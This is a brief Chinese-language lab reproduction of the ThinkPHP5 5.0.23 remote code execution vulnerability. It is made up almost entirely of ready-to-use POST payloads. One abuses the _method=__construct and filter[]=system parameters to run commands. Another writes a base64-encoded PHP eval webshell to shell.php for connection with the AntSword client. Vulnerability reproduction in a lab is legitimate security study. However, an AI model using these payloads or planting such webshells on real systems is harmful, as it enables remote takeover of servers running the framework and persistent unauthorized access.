ThinkPHP5 5.0.23-rce远程代码执行漏洞复现
启动环境,先关闭其他环境
启动
判断是否存在漏洞:访问/index.php?s=captcha页面,会出现报错
使用HackBar 插件发送 POST 请求
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=dir
通过echo命令写入 Webshell 文件并把木马进行base64编码
post发送
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4= | base64 -d > shell.php
访问shell.php,使用蚁剑连接